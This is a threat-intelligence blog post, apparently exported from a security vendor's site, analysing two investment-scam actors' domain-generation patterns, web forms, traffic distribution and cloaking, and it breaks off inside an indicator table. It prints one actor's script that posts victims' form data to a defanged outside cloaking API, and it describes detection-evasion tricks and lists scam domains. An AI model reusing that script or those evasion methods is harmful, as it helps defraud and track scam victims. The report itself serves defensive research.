{"id":11459,"date":"2025-04-28T11:55:22","date_gmt":"2025-04-28T18:55:22","guid":{"rendered":"https:\/\/blogs.infoblox.com\/?p=11459"},"modified":"2025-04-28T05:48:32","modified_gmt":"2025-04-28T12:48:32","slug":"uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams","status":"publish","type":"post","link":"https:\/\/www.infoblox.com\/blog\/threat-intelligence\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams\/","title":{"rendered":"Uncovering Actor TTP Patterns and the Role of DNS in Investment Scams"},"content":{"rendered":"<h3>Authors: Darby Wise, Piotr Glaska, Laura da Rocha<\/h3>\n<p>According to the Federal Trade Commission (FTC), consumers lost more money to investment scams than any other kind in 2024. This equates to a 24 percent increase from 2023 to 2024 in the amount of money lost\u2014a total of US$5.7 billion<sup>1<\/sup>.  These threats take a variety of forms, including the so-called pig butchering scams, which generally start with generic text messages to ones advertised through social media. Sometimes human interaction is involved and sometimes it is not. We track several investment scam actors and we\u2019ve previously published research on two of them, Savvy Seahorse and Horrid Hawk, who have distinctive DNS fingerprints.  <\/p>\n<p>This report expands on our previous publications to consider common techniques, tactics, and procedures (TTPs) of several investment scam actors who lure victims with fake platforms, including crypto exchanges. Fake websites referred to as \u201cprofit platforms\u201d are designed to convince users they are dealing with a legitimate business. We\u2019ve found that the actors often:<\/p>\n<ul class=\"list-spacing\">\n<li>Register large numbers of domains algorithmically over time, a technique we refer to as registered domain generation algorithms (RDGAs)<\/li>\n<li>Embed similar web forms to collect user data<\/li>\n<li>Hide their activity through traffic distribution systems (TDS)<\/li>\n<li>Leverage fake news often featuring spoofed government endorsements, a celebrity, or fake first-hand accounts of the investment program<\/li>\n<li>Share website structure indicative of the use of a kit<\/li>\n<\/ul>\n<p>We are often able to discover and track investment scams through DNS fingerprints. Two of the actors detailed in this paper, who we call Reckless Rabbit and Ruthless Rabbit, for example, are tracked through their use of RDGAs.<\/p>\n<p><span class=\"inline-image\"><img decoding=\"async\" style=\"float:left;margin-right: 15px;margin-bottom: 15px;\" width=\"180px\" alt=\"Reckless Rabbit and Ruthless Rabbit\" class=\"blog-image\" src=\"\/wp-content\/uploads\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams-image1.jpg\"><\/p>\n<h3>Embedded Web Forms<\/h3>\n<p>While the actors we investigated may use different means to distribute their campaigns, we found that all of them include, at some stage, an embedded web form, which we identified as the first and most notable TTP pattern. For example, Reckless Rabbit creates ads on Facebook that lead to fake news articles featuring a celebrity endorsement for the investment platform. The article includes a link to the scam platform which contains an embedded web form persuading the user to enter their personal information to \u201cregister\u201d for the investment opportunity.<br \/>\n<\/span><\/p>\n<p>The form typically requires the user\u2019s first and last name, email address, and phone number, which automatically formats the country code to match the user\u2019s IP geolocation. Some forms also require the user to create a password and offer the option to auto-generate one for them. Figure 1 below shows an example from a February 2025 scam where we accessed the landing page using a U.S.-based IP address; Figure 2 shows the auto-generated password. The actor uses this information to progress to the next step in the scam\u2014information validation checks.<\/p>\n<p><img decoding=\"async\" class=\"blog-image img-50\" src=\"\/wp-content\/uploads\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams-figure1.png\" alt=\"Figure 1. Example of embedded web form in a February 2025 investment scam\" \/><\/p>\n<p class=\"image-caption\">Figure 1. Example of embedded web form in a February 2025 investment scam<sup>2<\/sup><\/p>\n<p><img decoding=\"async\" class=\"blog-image img-50\" src=\"\/wp-content\/uploads\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams-figure2.png\" alt=\"Figure 2. Embedded web form with an auto-generated password field\" \/><\/p>\n<p class=\"image-caption\">Figure 2. Embedded web form with an auto-generated password field<sup>3<\/sup><\/p>\n<h3>Validation Checks<\/h3>\n<p>Once the user enters their personal details, most of the campaigns conduct validation checks on the user\u2019s information and their IP address. The checks each actor performs can vary, but common ones include:<\/p>\n<ul class=\"list-spacing\">\n<li>Validity of the user&#8217;s email and\/or phone number<\/li>\n<li>Duplication of emails and\/or phone numbers<\/li>\n<li>Multiple attempts to register using the same IP address within a specific timeframe<\/li>\n<li>Missing information (name, phone number, etc.)<\/li>\n<\/ul>\n<p>The scam actors often perform HTTP GET requests to legitimate IP validation tools, such as <span class=\"code-format\">ipinfo[.]io, ipgeolocation[.]io, or ipapi[.]co<\/span>. They use these validation checks to filter out traffic from specific countries, security researchers, and\/or bots.<\/p>\n<p>In many campaigns, if a user passes the validation, a TDS routes them either directly to the investment scam platform where they are encouraged to transfer money, or to a page that thanks them for registering and says a representative will contact them with additional information. Some campaigns use call centers to provide the victims with instructions on how to set up an account and transfer money into the fake investment platform. For users who do not pass the validation step, many campaigns will simply display a \u201cthank you\u201d landing page, as shown in Figure 3.<\/p>\n<p><img decoding=\"async\" class=\"blog-image\" src=\"\/wp-content\/uploads\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams-figure3.png\" alt=\"Figure 3. Ruthless Rabbit\u2019s \"thank you\u201d page\" \/><\/p>\n<p class=\"image-caption\">Figure 3. Ruthless Rabbit\u2019s &#8220;thank you\u201d page<sup>4<\/sup><\/p>\n<h3>Traffic Distribution Systems<\/h3>\n<p>Some of the scam actors we\u2019ve researched leverage their own TDSs to collect information about the victim and conditionally make decisions on which web content the user will be redirected to. This is the case for an active crypto scam actor we have been tracking that utilizes a TDS to route users from different countries to different fake investment platforms. Table 1 below shows this actor\u2019s TDS redirections based on the geolocation of the user accessing the crypto scam page <span class=\"code-format\">bitcoin-profit[.]org<\/span>. This threat actor routes users from the United States to the legitimate platform eToro, possibly to evade detection from security researchers.  <\/p>\n<table border=\"1\">\n<thead>\n<tr>\n<th>IP Geolocation<\/th>\n<th>TDS Domain(s)<\/th>\n<th>Investment Platform Domain<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>Switzerland<sup>5<\/sup><\/td>\n<td class=\"code-format\">mykryplogin[.]com -> murzasanny[.]com<\/td>\n<td class=\"code-format\">trading[.]nexperts[.]pro<\/td>\n<\/tr>\n<tr>\n<td>Canada<sup>6<\/sup><\/td>\n<td class=\"code-format\">powapi[.]net<\/td>\n<td class=\"code-format\">primeassets[.]uk<\/td>\n<\/tr>\n<tr>\n<td>Australia<sup>7<\/sup><\/td>\n<td class=\"code-format\">powapi[.]net \u2013> camersyf[.]com<\/td>\n<td class=\"code-format\">trading[.]xptraders[.]com<\/td>\n<\/tr>\n<tr>\n<td>United States<sup>8<\/sup><\/td>\n<td class=\"code-format\">cryptoveteran[.]care<\/td>\n<td class=\"code-format\">etoro[.]com (legitimate)<\/td>\n<\/tr>\n<tr>\n<td colspan=\"3\">Table 1. TDS and redirection domains for a crypto scam campaign. Users accessing <span class=\"code-format\">bitcoin-profit[.]org<\/span> from Switzerland and Australia redirect to a secondary TDS domain.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3>RDGAs and Dynamic Website Logos<\/h3>\n<p>In a previous blog we published in 2023, we introduced the concept of RDGAs:   <\/p>\n<p><em>Registered domain generation algorithms (RDGAs) are a programmatic mechanism that allows actors to create many domain names at once or over time to register for use in their infrastructure. These differ from traditional domain generation algorithms (DGAs) that have long been associated with malware in significant ways. In an RDGA, the algorithm is a secret kept by the actor, and they register all the domain names. In a traditional DGA, the malware contains an algorithm that can be discovered, and most of the domain names will not be registered. While DGAs are used exclusively for connection to a malware controller, malicious RDGAs are used for a wide range of malicious activity.<sup>9<\/sup><\/em><\/p>\n<p>Since then, we\u2019ve observed over 3 million RDGA domains on the internet. These domains are commonly used in advertising, so seeing these investment scams intermingled with other product ads makes sense. In the actor-specific sections of this paper below, we will show the distinct RDGA patterns that Reckless and Ruthless Rabbits use to create large sets of domains for their campaigns.<\/p>\n<p>Some actors use dictionary-based RDGAs to generate domain names that match dynamic website names and logos in their scam pages. Each website contains an embedded web form for the user to provide their information. As an example, Figure 4 below shows that the top left corners of the scam websites display the supposed logo of the investment platform\/application, matching the domain name. The different pages displayed in Figure 4 have the same or very similar content, but the logo varies depending on the domain name. Scammers leverage the RDGAs to create large sets of domains, which they in turn use to automatically update the logo accordingly, to scale their campaigns.<\/p>\n<table>\n<tbody>\n<tr>\n<td class=\"code-format\">vasezonix-app[.]trade<br \/>\nvensotixapp-platform[.]store<br \/>\nvasezonixapp[.]guru<br \/>\nvensotixapp[.]click<br \/>\nvenzotexapp[.]cloud<\/td>\n<td><img decoding=\"async\" class=\"blog-image\" src=\"\/wp-content\/uploads\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams-figure4a.png\" alt=\"Figure 4\" \/><\/td>\n<\/tr>\n<tr>\n<td class=\"code-format\">aportunex-app[.]shop<br \/>\naportunex-app[.]trade<br \/>\naportunex-app[.]wiki<br \/>\naportunexapp[.]bond<br \/>\naportunexapp[.]help<br \/>\naportunexapp[.]trade<br \/>\naportunexapp[.]wiki<\/td>\n<td><img decoding=\"async\" class=\"blog-image\" src=\"\/wp-content\/uploads\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams-figure4b.png\" alt=\"Figure 4\" \/><\/td>\n<\/tr>\n<tr>\n<td class=\"code-format\">bitcoin-apex[.]guru<br \/>\nbitcoin-apex[.]help<br \/>\nbitcoin-apex[.]website<br \/>\nbitcoinapex-platform[.]click<br \/>\nbitcoinapex-platform[.]guru<br \/>\nbitcoinapex-platform[.]top<br \/>\nbitcoinapex[.]website <\/td>\n<td><img decoding=\"async\" class=\"blog-image\" src=\"\/wp-content\/uploads\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams-figure4c.png\" alt=\"Figure 4\" \/><\/td>\n<\/tr>\n<tr>\n<td colspan=\"2\">Figure 4: Unnamed investment scam actor using the same logo design, where the name on the logo matches the domain name. In this example, the actor creates domains in bulk with the same second-level domain (SLD) label but on several top-level domains (TLDs)<sup>10, <\/sup><sup>11, <\/sup><sup>12<\/sup><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>Other patterns we have seen threat actors use in most of the investment scam campaigns include:<\/p>\n<ul class=\"list-spacing\">\n<li>Distributing scam domains through malicious Facebook ads<\/li>\n<li>Promising high returns if a user inputs a small amount of money during registration<\/li>\n<li>Predominantly targeting users in Eastern European countries, such as Russia, Romania, Poland, etc.<\/li>\n<li>Excluding traffic from certain countries<\/li>\n<\/ul>\n<h3>Investment Threat Actors<\/h3>\n<p>As we mentioned at the beginning of the paper, two of the more notable investment scam actors that we are tracking are Reckless and Ruthless Rabbits. They follow many of the common TTPs we\u2019ve described above, but they also have their own distinguishing characteristics.<\/p>\n<h3>Reckless Rabbit<\/h3>\n<p>Reckless Rabbit lures victims into fake investment scams through malicious Facebook advertisements. They intersperse them among other content, most commonly items for sale on popular marketplace stores such as Amazon (see Figure 5). This technique of burying their investment scam ads among other, seemingly innocuous ads may be a trick they use to avoid policy enforcement from Facebook.<\/p>\n<p><img decoding=\"async\" class=\"blog-image\" src=\"\/wp-content\/uploads\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams-figure5.png\" alt=\"Figure 5: Reckless Rabbit\u2019s Facebook ads for products on Amazon\" \/><\/p>\n<p class=\"image-caption\">Figure 5: Reckless Rabbit\u2019s Facebook ads for products on Amazon<\/p>\n<p>The main scam advertisements take the user to either:<\/p>\n<ul class=\"list-spacing\">\n<li>pages such as a full fake news story, which includes a link to the investment landing page (Figure 6), or<\/li>\n<li>the investment platform itself (Figure 7).<\/li>\n<\/ul>\n<div class=\"img-container\">\n<img decoding=\"async\" src=\"\/wp-content\/uploads\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams-figure6a.png\" alt=\"Figure 6a\"><br \/>\n<img decoding=\"async\" src=\"\/wp-content\/uploads\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams-figure6b.png\" alt=\"Figure 6b\">\n<\/div>\n<p class=\"image-caption\">Figure 6: Website with fake news about a Polish celebrity and the investment scam lure at the end of the article. These are both translated from the original page in Polish. The celebrity\u2019s image and name have been redacted for the purpose of this paper.<\/p>\n<div class=\"img-container\">\n<img decoding=\"async\" src=\"\/wp-content\/uploads\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams-figure7a.png\" alt=\"Figure 7a\"><br \/>\n<img decoding=\"async\" src=\"\/wp-content\/uploads\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams-figure7b.png\" alt=\"Figure 7b\">\n<\/div>\n<p class=\"image-caption\">Figure 7: Reckless Rabbit\u2019s investment scam platform in Norwegian and the translation to English. The site contains a web form similar to other investment scam actors<sup>13<\/sup> and a fake endorsement from a Norwegian billionaire businessman.<\/p>\n<p>Reckless Rabbit has been creating domains since as early as April 2024, with new domains created on a near-daily basis. Table 2 shows examples of the two RDGA patterns they use to create these domains. The first involves random characters, a three-letter month abbreviation, an English word, and is in the .info TLD. The second pattern combines two or three English words, which may or may not be separated by a dash. The domains in this group are in the .com and .info TLDs.<\/p>\n<table>\n<thead>\n<tr>\n<th width=\"50%\">Domain Pattern<\/td>\n<th>Examples<\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td class=\"code-format\">&lt;1-2 random characters&gt;&lt;3 letter month&gt;&lt;short English word&gt;[.]info<\/td>\n<td class=\"code-format\">kc<strong>feb<\/strong>drill[.]info<br \/>\nal<strong>mar<\/strong>silk[.]info<br \/>\ni<strong>apr<\/strong>wall[.]info<br \/>\nw<strong>may<\/strong>curr[.]info<br \/>\nf<strong>jun<\/strong>medi[.]info<br \/>\nf<strong>jul<\/strong>swap[.]info<br \/>\nf<strong>aug<\/strong>swap[.]info<br \/>\ns<strong>sep<\/strong>coin[.]info<br \/>\nk<strong>oct<\/strong>ice[.]info<br \/>\nl<strong>nov<\/strong>chalk[.]info<br \/>\nqp<strong>dec<\/strong>bid[.]info<\/td>\n<\/tr>\n<tr>\n<td class=\"code-format\">&lt;2-3 random English words separated by dashes or not&gt;&#91;.&#93;&lt;com, info&gt;<\/td>\n<td class=\"code-format\">well-groomedcanvas[.]com<br \/>\nupkeep-vocal[.]com<br \/>\nextra-largewrinkles[.]info<br \/>\nport-rusty-time[.]com<br \/>\nlibrary-novel-axe[.]com<br \/>\nacoustic-fund-rate[.]info<br \/>\ntemple-well-known[.]info<br \/>\nroomyspeedboat[.]info<br \/>\nlongmarble[.]info<br \/>\nsixcrowd[.]com<br \/>\nmercifulknife[.]com<\/td>\n<\/tr>\n<tr>\n<td colspan=\"2\">Table 2: Reckless Rabbit\u2019s RDGA domain patterns and examples<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>When the victim accesses the fake news website, the actor collects information about the user, such as IP address and geolocation, to determine the language that will be displayed on the page. They use the metadata as input to make a call to an API endpoint they maintain (<span class=\"code-format\">\/api\/v1\/trigger\/field\/<\/span>) to fetch and display the site content appropriately. Figure 8 shows a code snippet of one of the scripts called in the HTTP request chain and includes the API call.<\/p>\n<p><img decoding=\"async\" class=\"blog-image\" src=\"\/wp-content\/uploads\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams-figure8.png\" alt=\"Figure 8. Code snippet of scripts that make an API call to get the language and the page to which the user will get redirected\" \/><\/p>\n<p class=\"image-caption\">Figure 8. Code snippet of scripts that make an API call to get the language and the page to which the user will get redirected<sup>14, <\/sup><sup>15<\/sup><\/p>\n<p>We&#8217;ve observed instances where Reckless Rabbit uses validation checks to filter out traffic from specific countries, including Afghanistan, Somalia, Liberia, Madagascar, and others. The code snippet in Figure 9 shows the full list of excluded countries. <\/p>\n<p><img decoding=\"async\" class=\"blog-image\" src=\"\/wp-content\/uploads\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams-figure9.png\" alt=\"Figure 9: Code snippet that shows a variable for countries to be excluded\" \/><\/p>\n<p class=\"image-caption\">Figure 9: Code snippet that shows a variable for countries to be excluded<sup>16, <\/sup><sup>17<\/sup><\/p>\n<p>Reckless Rabbit configures wildcard DNS responses to their domains, which means that a query to any subdomain (e.g., <span class=\"code-format\">wildcardbdidbanpdla[.]brilliantwallaby[.]info<\/span>) of their domains will return a response, as shown in Figure 10. Wildcarding generates noise in DNS because it means anyone can make a query to any subdomains for that SLD, and the subdomains will return responses. This makes it difficult to determine which subdomains are actively being used by an actor, and which subdomains are random queries triggered by, for example, security researchers. In this case, security tools may not add the SLD to their feeds and instead only add the subdomains that were confirmed to contain malicious content, thereby helping the actor to use their domains longer. <\/p>\n<p><img decoding=\"async\" class=\"blog-image\" src=\"\/wp-content\/uploads\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams-figure10.png\" alt=\"Figure 10. Wildcard response behavior to a random subdomain of an existent Reckless Rabbit domain\" \/><\/p>\n<p class=\"image-caption\">Figure 10. Wildcard response behavior to a random subdomain of an existent Reckless Rabbit domain<\/p>\n<p>Reckless Rabbit uses several additional techniques to avoid detection, including:<\/p>\n<ul class=\"list-spacing\">\n<li>Interspersing ads that redirect to the investment scam between ads for items supposedly being sold on popular marketplaces, such as Amazon (Figure 11)<\/li>\n<li>Adding unrelated images to avoid detection based on image recognition (Figure 12)<\/li>\n<li>Displaying (in the ad) a decoy domain that is different from the domain that the user will be redirected to once they click on the link (Figure 13)<\/li>\n<li>Using a decoy page with non-suspicious content\u2014such as a website for a restaurant\u2014on the SLD, shielding the actual investment scam page hosted on the full URL (Figure 14)<\/li>\n<\/ul>\n<div class=\"grid-container\">\n<div class=\"grid-item\">\n<img decoding=\"async\" src=\"\/wp-content\/uploads\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams-figure11.png\" alt=\"Figure 11. Investment scam lure mixed with items being sold in marketplaces\"><\/p>\n<p class=\"image-caption\">Figure 11. Investment scam lure mixed with items being sold in marketplaces<\/p>\n<\/div>\n<div class=\"grid-item\">\n<img decoding=\"async\" src=\"\/wp-content\/uploads\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams-figure12.png\" alt=\"Figure 12. Technique to prevent detection by image recognition-based security technology\"><\/p>\n<p class=\"image-caption\">Figure 12. Technique to prevent detection by image recognition-based security technology<\/p>\n<\/div>\n<\/div>\n<div class=\"grid-container\">\n<div class=\"grid-item\">\n<img decoding=\"async\" src=\"\/wp-content\/uploads\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams-figure13.png\" alt=\"Figure 13. Example of Facebook ad caption with decoy domain, amazon[.]pl. The ad redirects to a URL under tyxarai[.]org and is associated to wjulbucks[.]info\"><\/p>\n<p class=\"image-caption\">Figure 13. Example of Facebook ad caption with decoy domain, <span class=\"code-format\">amazon[.]pl<\/span>. The ad redirects to a URL under <span class=\"code-format\">tyxarai[.]org<\/span> and is associated to <span class=\"code-format\">w<strong>jul<\/strong>bucks[.]info<\/span><sup>18, <\/sup><sup>19<\/sup><\/p>\n<\/div>\n<div class=\"grid-item\">\n<img decoding=\"async\" src=\"\/wp-content\/uploads\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams-figure14.png\" alt=\"Figure 14. Decoy page with non-suspicious content on the SLD\"><\/p>\n<p class=\"image-caption\">Figure 14. Decoy page with non-suspicious content on the SLD<sup>20<\/sup><\/p>\n<\/div>\n<\/div>\n<h3>Ruthless Rabbit<\/h3>\n<p>Ruthless Rabbit has been running investment scam campaigns since at least November 2022. These campaigns follow similar themes to those we have seen from Horrid Hawk and other Russian-hosted scam campaigns that primarily target users in Russia, Poland, Romania, and Kazakhstan, among other countries. Most current active campaigns are hosted on two dedicated IPs, but the actor has previously used at least eight different IPs hosted with Aeza, as well as a dedicated IP hosted with IROKO. Combined, these IPs host over 2,600 actor-owned domains. They use Namecheap for domain registration, name servers and mail servers. <\/p>\n<p>In May 2024, Ruthless Rabbit began using a single RDGA pattern to create the large number of domains necessary to operate their scams (see Table 3).<\/p>\n<table>\n<thead>\n<tr>\n<th>Domain Pattern<\/td>\n<th>Examples<\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td class=\"code-format\">&lt;random English word or 3-7 random characters&gt;&lt;bik, job, mot, lin, tyt, byk, bot, fat, pit, kot, etc.&gt;[.]pro<\/td>\n<td class=\"code-format\">topsmot[.]pro<br \/>\nsitemot[.]pro<br \/>\nviserbik[.]pro<br \/>\ngoaljob[.]pro<br \/>\nsomajob[.]pro<br \/>\nwasakot[.]pro\n<\/td>\n<\/tr>\n<tr>\n<td colspan=\"2\">Table 3. Ruthless Rabbit RDGA pattern and examples<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3>Campaign Themes<\/h3>\n<p>In February 2023, Ruthless Rabbit started hosting Baltic Pipe financial scam pages, a common theme used in investment scams targeting Eastern European users. Over time, they diversified the themes of their landing pages, to include scams spoofing WhatsApp, Google Finance, and Meta. The most prevalent campaign theme since May 2024 is a news article spoofing the Russian-language news website \u201cChannel One\u201d that claims users who sign up for the \u201cGazInvest\u201d platform will earn up to 300,000 Russian rubles. This page (see Figure 15), shares the common TTP patterns we mentioned above, including lures of high returns, an embedded web form, and IP geolocation tools for conducting validation checks.<\/p>\n<p><img decoding=\"async\" src=\"\/wp-content\/uploads\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams-figure15.png\" alt=\"Figure 15. Landing page for the Russian GazInvest scam\"><\/p>\n<p class=\"image-caption\">Figure 15. Landing page for the Russian GazInvest scam<sup>21<\/sup><\/p>\n<p>The actor hosts their scam landing pages on specific URL paths that change per campaign theme. They use a concealment technique of giving users who attempt to access the SLD alone rather than a URL\u2014a typical move for security researchers\u2014an HTTP 404 Not Found error. Table 4 shows examples of the URL paths for some of the most prevalent campaigns. We\u2019ve broken out the SLDs and the URL paths because the latter are what the actor changes every couple of months.<\/p>\n<table>\n<thead>\n<tr>\n<th>Campaign Theme<\/th>\n<th>SLD<\/th>\n<th>URL Path<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>January 2025 \u2013 GazInvest Platform<sup>22<\/sup><\/td>\n<td class=\"code-format\">brudamot[.]pro<\/td>\n<td class=\"code-format\">\/4YJ3LH?MPC_3=16k3ua14tff7k<\/td>\n<\/tr>\n<tr>\n<td>September 2024 \u2013 GazInvest Platform<sup>23<\/sup><\/td>\n<td class=\"code-format\">dropbik[.]pro<\/td>\n<td class=\"code-format\">\/lander\/gazinvestgaz_4301\/<\/td>\n<\/tr>\n<tr>\n<td>March 2025 \u2013 Spoofed Google Finance Page<sup>24<\/sup><\/td>\n<td class=\"code-format\">easyjob[.]pro<\/td>\n<td class=\"code-format\">\/google_finance_79\/<\/td>\n<\/tr>\n<tr>\n<td>December 2024 \u2013 Fake Russian News Site<sup>25<\/sup><\/td>\n<td class=\"code-format\">kinabik[.]pro<\/td>\n<td class=\"code-format\">\/JF5vNK?MPC_3=2pgkm0e57koso<\/td>\n<\/tr>\n<tr>\n<td colspan=\"3\">Table 4. Examples of URL paths for different SLDs and campaigns<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>What\u2019s interesting about Ruthless Rabbit is that they operate their own cloaking service to perform validation checks; the cloaking service domain (<span class=\"code-format\">mcraftdb[.]tech<\/span>) hosts publicly available documentation for their API titled \u201cMcraft MediaCraft Tech API.\u201d The documentation (Figure 16) provides insight into some of the actor\u2019s validation checks on \u201cleads,\u201d or users, who enter personal information into the forms embedded in the investment scam pages. The cloaking service looks for users entering duplicate information or attempting to access the investment platform multiple times within the previous 20 minutes using the same IP address. Users who do not pass the checks will be redirected to either a 404 Not Found error page or to another page on the SLD titled <strong>thanks.html<\/strong>, which states someone will contact them for additional information. Figure 17 shows the form script the actor uses for this API call.<\/p>\n<p><img decoding=\"async\" src=\"\/wp-content\/uploads\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams-figure16.jpg\" alt=\"Figure 16. API documentation for the actor\u2019s validation API\"><\/p>\n<p class=\"image-caption\">Figure 16. API documentation for the actor\u2019s validation API<sup>26<\/sup><\/p>\n<table>\n<tbody>\n<tr>\n<td class=\"code-format\">\n<pre>$('form').submit(function (event){\r\n    $(this).submit(false);\r\n    event.preventDefault();\r\n    event.stopPropagation();\r\n    event.stopImmediatePropagation();\r\n    if($('.iti__selected-dial-code').length){\r\n        var prefix = $('.iti__selected-dial-code').html().slice(1)\r\n        $(this).append(`&lt;input type=\"hidden\" name=\"prefix\" value=\"${prefix}\" \/&gt; `)\r\n    }\r\n    var host = `&host=${$(location).attr('hostname')}`\r\n    var url=`&url=${$(location).attr('href')}`\r\n    var so=`&so=Google Finance`\r\n    var args = host + url + so\r\n    var search = location.search.substring(1);\r\n    \r\n    $.ajax({\r\n            type: \"POST\",\r\n            url: 'https:\/\/mcraftdb[.]tech\/api\/v1\/submit\/a6111ace-7304-4d9b-8dfe-9aafb7e9638e\/' + \"?\" + search,\r\n            data: $(this).serialize() + args,\r\n            headers: $(this).headers,\r\n            dataType: 'json',\r\n            crossDomain: true,\r\n            success: function (response) {\r\n                if (response.status === true) {\r\n                    document.location.replace(response.data);\r\n                } else {\r\n                    document.location.href = location.protocol + '\/\/' + location.host + location.pathname.substring(0, location.pathname.lastIndexOf('\/') + 1) + 'thanks.html';\r\n                }\r\n            },\r\n        })\r\n\r\n    var btn = $(this).find(':submit')\r\n    \r\n    btn.prop('disabled', true)\r\n    setTimeout(function () {\r\n        btn.prop('disabled', false)\r\n\r\n    },30000)\r\n})<\/pre>\n<\/td>\n<\/tr>\n<tr>\n<td colspan=\"2\">Figure 17. API call used by Ruthless Rabbit to perform validation checks on the user<sup>27<\/sup><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>Interestingly, none of the forms in these campaigns have a field to enter an email address, but the response examples in Figure 16 indicate an email is required. We discovered that embedded into the HTML code is a script with a function <span class=\"code-format\">generateRandomEmail()<\/span>, (see Figure 18), that generates a new email address in the hidden form field every time the page is refreshed. This indicates that the actor may not actually use the phone number and email address to contact the user but instead uses them only to perform the validation checks. Most of the campaigns do, however, perform checks on the user\u2019s IP geolocation via <span class=\"code-format\">ipgeolocation[.]io<\/span> and <span class=\"code-format\">ipinfo[.]io<\/span>, two legitimate geolocation lookup tools.<\/p>\n<p><img decoding=\"async\" src=\"\/wp-content\/uploads\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams-figure18.jpg\" alt=\"Figure 18. HTML code showing the generateRandomEmail() function\"><\/p>\n<p class=\"image-caption\">Figure 18. HTML code showing the <span class=\"code-format\">generateRandomEmail()<\/span> function<\/p>\n<p>Users who pass the validation checks will be routed to some sort of investment platform where they will be prompted to enter their financial information to complete the registration for the investment program. After numerous tests, however, we were unable to successfully reach that final step. Despite passing the validation checks for all personal details, including the IP geolocation and phone number, we still received a failed response stating, \u201cCant register lead, no more fallbacks available;\u201d. Oddly enough, there was no information on this type of response in the actor\u2019s API documentation.<\/p>\n<h3>The Importance of DNS<\/h3>\n<p>Threat actors operating these large-scale and increasingly sophisticated scams exploit DNS to help build and maintain their infrastructure. Over the years, actor abuse of DNS mechanisms, such as RDGAs and TDSs, has been underreported in the security community, despite being crucial to malicious campaigns.<\/p>\n<p>Some investment scam actors capitalize on malicious TDSs to operate their campaigns. A TDS enables threat actors to strengthen their infrastructure, making it more resilient by providing the ability to hide malicious content from security researchers and bots. For example, one actor we\u2019ve been tracking uses an HTTP-based TDS to shield their malicious scam landing pages. We show an instance of a redirection chain in their campaign in Figure 19. Only by tracking these TDSs through DNS are we able to detect and block the infrastructure at scale, before the redirections even occur.<\/p>\n<p><img decoding=\"async\" src=\"\/wp-content\/uploads\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams-figure19.png\" alt=\"Figure 19. Redirection chain for an investment scam actor\u2019s TDS\"><\/p>\n<p class=\"image-caption\">Figure 19. Redirection chain for an investment scam actor\u2019s TDS<sup>28<\/sup><\/p>\n<p>Actors also take advantage of RDGAs to create large numbers of domains to use in their campaigns, which enables them to hide in plain sight and change out domains often. As we wrote last summer:<\/p>\n<p><em>\u201cScammers use RDGAs for the same reasons that other threat actors use them: their domains are frequently blocked or taken down by service providers. Consequently, it&#8217;s advantageous for them to have a steady stream of new domains with which to execute their scams.\u201d<\/em><\/p>\n<h3>Conclusion<\/h3>\n<p>There are so many RDGA domains created every day that it is impossible for human researchers to find and assess them all. Through the lens of DNS, we are able to leverage automated detection and correlate these investment scam domains at scale. Threat actors like Reckless and Ruthless Rabbits will be relentless in their attempts to trick as many users as possible. Because these types of scams have proven to be <strong>highly profitable<\/strong> for them, they will continue to grow rapidly\u2014both in number and sophistication.<\/p>\n<h3>Indicators of Activity<\/h3>\n<table>\n<thead>\n<tr>\n<th>Indicator<\/th>\n<th>Note<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td class=\"code-format\">middle.sturdypants[.]com<br \/>\nbrilliantwallaby[.]info<br \/>\nencouragingtax[.]info<br \/>\ntyxarai[.]org<br \/>\nupkeep-vocal[.]com<br \/>\nextra-largewrinkles[.]info<br \/>\nport-rusty-time[.]com<br \/>\nlibrary-novel-axe[.]com<br \/>\nacoustic-fund-rate[.]info<br \/>\ntemple-well-known[.]info<br \/>\nroomyspeedboat[.]info<br \/>\nlongmarble[.]info<br \/>\nsixcrowd[.]com<br \/>\nmercifulknife[.]com<br \/>\nwjulbucks[.]info<br \/>\nkcfebdrill[.]info<br \/>\nalmarsilk[.]info<br \/>\niaprwall[.]info<br \/>\nwmaycurr[.]info<br \/>\nbmaypost[.]info<br \/>\nfjunmedi[.]info<br \/>\nfjulswap[.]info<br \/>\nfaugswap[.]info<br \/>\nssepcoin[.]info<br \/>\nkoctice[.]info<br \/>\nlnovchalk[.]info<br \/>\nqpdecbid[.]info\n<\/td>\n<td>Indicators used by Reckless Rabbit in investment scam campaigns<\/td>\n<\/tr>\n<tr>\n<td 